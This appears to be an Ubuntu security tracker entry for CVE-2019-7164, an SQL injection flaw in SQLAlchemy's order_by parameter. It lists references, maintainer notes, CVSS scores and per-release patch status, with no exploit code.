Candidate: CVE-2019-7164
PublicDate: 2019-02-20 00:29:00 UTC
References:
 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7164
Description:
 SQLAlchemy through 1.2.17 and 1.3.x through 1.3.0b2 allows SQL Injection
 via the order_by parameter.
Ubuntu-Description:
Notes:
 mdeslaur> since 1.0, sqlalchemy issues a warning when text() is omitted
 mdeslaur> this fix for this issue turns the warning into an error
 mdeslaur> since this change may break existing applications, it may not
 mdeslaur> get fixed, marking priority as low
Bugs:
 https://github.com/sqlalchemy/sqlalchemy/issues/4481
 http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=922669
 https://github.com/sqlalchemy/sqlalchemy/issues/4538 (example regression)
Priority: low
Discovered-by:
Assigned-to:
CVSS:
 nvd: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H [9.8 CRITICAL]
 nvd: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H [9.8 CRITICAL]

Patches_sqlalchemy:
 upstream: https://github.com/sqlalchemy/sqlalchemy/commit/30307c4616ad67c01ddae2e1e8e34fabf6028414
upstream_sqlalchemy: needs-triage
precise/esm_sqlalchemy: DNE
trusty_sqlalchemy: ignored (reached end-of-life)
trusty/esm_sqlalchemy: DNE (trusty was needed)
xenial_sqlalchemy: ignored (end of standard support, was needed)
esm-infra/xenial_sqlalchemy: needed
bionic_sqlalchemy: needed
cosmic_sqlalchemy: ignored (reached end-of-life)
disco_sqlalchemy: ignored (reached end-of-life)
eoan_sqlalchemy: not-affected (1.2.18+ds1-2ubuntu1)
focal_sqlalchemy: not-affected (1.2.18+ds1-2ubuntu1)
groovy_sqlalchemy: not-affected (1.2.18+ds1-2ubuntu1)
hirsute_sqlalchemy: not-affected (1.2.18+ds1-2ubuntu1)
impish_sqlalchemy: not-affected (1.2.18+ds1-2ubuntu1)
jammy_sqlalchemy: not-affected (1.2.18+ds1-2ubuntu1)
devel_sqlalchemy: not-affected (1.2.18+ds1-2ubuntu1)